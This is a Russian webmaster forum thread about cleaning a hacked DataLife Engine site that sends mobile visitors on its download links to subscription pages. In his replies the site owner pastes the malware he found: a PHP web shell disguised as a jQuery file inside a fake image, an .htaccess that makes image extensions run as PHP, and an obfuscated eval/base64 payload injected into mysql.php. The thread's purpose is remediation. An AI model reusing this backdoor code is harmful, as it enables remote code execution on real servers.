В dle встроили вредоносный код, нужна помощь.

TOPMUZLO TOPMUZLO   12.05.2020 12:25   580  

Недавно я писал про то что получил фильтр https://pr-cy.ru/qa/question/40567, сегодня написал повторно в яндекс, сказали что проблема осталась. Так вот я определил что при нажатии скачать идет редирект для мобильных пользователей  на подписки. Код не нашел. В каких файлах его можно найти ? 

Кнопка скачать идет через пример: /?do=download&id=14206  редирект идет вначале на этот сайт http://w3-org.cc/ и далее 

Вообщем кто сможет помочь советом где копать.. 


Ответы на вопрос (17) Написать ответ
TOPMUZLO TOPMUZLO   04.06.2020 00:06
После очередного появления кода опять начал искать. и нашел

в /uploads/fotos файл .htaccess в котором
<filesmatch ".([pp][hh][pp]|[cc][gg][ii]|[pp][ll]|[pp][hh][ii][mm][ll]).?"="">
   Order allow,deny
   Deny from all
</filesmatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg

и рядом файл foto_67823364.jpeq с кодом

<?php 
/*
 * jQuery Image Library v1.6.1
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fjquery.com%2F" target="_blank" class="redactor-autoparser-object">http://jquery.com/</a>
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fjquery.org%2Flicense" target="_blank" class="redactor-autoparser-object">http://jquery.org/license</a>
 *
 * Includes Sizzle.js
 * <a href="https://pr-cy.ru/jump/?url=http%3A%2F%2Fsizzlejs.com%2F" target="_blank" class="redactor-autoparser-object">http://sizzlejs.com/</a>
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');} 
print"<!-- te"."st --> "; 
?>
0
Решение
vasyev1 vasyev1   12.05.2020 12:29
Посмотрите в engine.php
0
TOPMUZLO TOPMUZLO   12.05.2020 12:56
нашел левый код в /engine/classes/mysql.php вот в блокнот запостил - https://shrib.com/#BaleenWhale2lDxRQL кто расшифрует ?
0
TOPMUZLO TOPMUZLO   12.05.2020 13:08
но удаление этой фигни мне пока никак не помогло все равно редирект идет
0
TOPMUZLO TOPMUZLO   12.05.2020 13:15
почистил /engine/cache вроде бы пока нет симптомов. еще почекаю
0
skapunker skapunker   12.05.2020 16:59
Если сам не можешь найти малварь, попробуй Virusdie.
0
TOPMUZLO TOPMUZLO   12.05.2020 17:09
выше написал - нашел левый код в /engine/classes/mysql.php вот в блокнот запостил - https://shrib.com/#BaleenWhale2lDxRQL
0
TOPMUZLO TOPMUZLO   12.05.2020 17:47
результат тот же. код удален но переходы идут. ищу
0
Павел Илонов Павел Илонов   12.05.2020 18:21
htacess проверье
базу данных скачайте на ПК
showfull
showshort
dbconfig
main php
и main tpl (код иногда не видно в экране прокрутите левее)
и другие tpl, наверное паблик шаблон скачали или нуленую дле

еще можно скачать весь сайт с БД и проверить утилитой от доктор веба cureit или другими антивирусами (не Авастом только)
поставьте 444 на htacess главный
0
Павел Илонов Павел Илонов   12.05.2020 18:25
на будущее качайте с официального сайта DLE, а шаблоны натягивайте сами (за 2 дня научитесь) любой html шаблон сделать ДЛЕ шабом
0
LoginIP LoginIP   12.05.2020 18:58
в файле function.php посмотри GET переменные будут
0
TOPMUZLO TOPMUZLO   12.05.2020 20:48
Вообщем код находился в 2х файлах: 

/engine/classes/mysql.php
/engine/data/dbconfig.php

Я так понимаю я пароль подарил кому-то. С шаблонами проблем нет, они покупные. 
0
LoginIP LoginIP   12.05.2020 21:14
htaccess файлы в папках uploads проверь еще, шеллы могут быть с форматом pnQ jpQ и т.д
0
TOPMUZLO TOPMUZLO   12.05.2020 21:31
Вроде все впорядке. Ничего подозрительного не нашел там.
0
TOPMUZLO TOPMUZLO   12.05.2020 21:33
Левый Код:

$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVHtv2zYQ/yoOYIQS4sgP2bEdQ2jWwtiCDe2WJiuG1hAo6SyxkkiVDztB6e++oxwsceF52B+84+OeP95dN5EQkZh0AhIb5RjI9uAIy8hiW7AKvHAwn1864jcSNl63EKq3J0ayXleu/QVbe0wp0F43fvfhw6+3y89dtL3y/e83eJsKUTLw3FXvUOBi2NOsBs+/mE3mk2mP9Im/2KE17+ZQMIrIfDSeDsLZkPhC/uvzdHb6eX7yeTYgR0ImV+P5aDCeTa7C+WSMZDYPB5PZ+Go8C+djciSDroR1hE4+Lu/+XN59Vlo64JBpYZoGpEeYNLFWYL4h4r6/WjgoX2mQu+UfD8uP9/HD3S1ZLW4c3NEpe1qJIm60Lp6tldtmXRpalZvHlG8Kk1TRcDqYYGT/EZgEjB3kiy1vPB5d4roIZ6PhpSP+m1Qo7/nzYf1PGfQcWv51rWNJeeb0eqPhIPQXBdAMbT97I+EblqdBU2tXZn3FCt13uzKFIm2v0jRwPJfCsctw2972r5tWQxeday5Yu6WtgviN+MjOFYi2fhF8ZJJujayApyLDj8QqdSINlbQGDTL60i3haStkhmp4UHBuZDREvSOgRK9ROUdYfrBOCq2b675Lw/0UUhT3/QU8Mr3YdY3KT4OuOeQ0lqDMqz/83z/VfcyrhjdfqfmmYGsaHREliOtN7+ylsn65v/89fsBT/NPPy/f3ZOUa4sQzNkfbM2fY/HlcU50WHuknlGXGpgiBRSQqsJ/Cd7FdVprecvspB22xBODRMhpTmRaWFkJYltfUvhXaNgzrwdI6QcW/6FsptlaIHA8JPtaUVUGfkZ7Dzcd+xAQOfLeWg72ctKIMpLGbMkjF3khgM5OWblklcmGsKoCjY043zqmognTvWtot01gKlnGlaY5RcXfap2a0SQBpkDzt4xYZF6U1lcjtmqaQiMAqaHN7cslhPIqjZVWzkZVJGtiE8XyfB9Zem8VhGk2QYOIKPaqnOhHK8kwKltmaZY0FyUB96VwNbKHT2IoEB7H9OqrBoiyjHKU4s00hOLxA5bru7Ic5TLIKcLhjneBAXx2XeZ7V7dNBiBHNMg5bZbEBcqYcOtEaIEsoghtVDl1tkTEeNEVjaVa/3qGCpJoJvo9Qsr0Lt+ucRR03KY8M2+dBPT02V3e73d+Pxjob')));";$release_this = "cre"."ate_"."function";@$dle_func = $release_this('', "$liciens;");$dle_func('');
1
STavTerier STavTerier   16.05.2020 14:35
Привет, решил проблему? Могу помочь и глянуть что у тебя там. Сам недавно на этом попался 
0
TOPMUZLO TOPMUZLO   16.05.2020 17:00
Решил. Нашел код в этих файлах /engine/classes/mysql.php и 
/engine/data/dbconfig.php. Сменил пароли
0

Войдите, чтобы написать ответ
Вход Регистрация

C ТОП50 в ТОП5 с помощью поведенческих факторов в Яндексе и Google.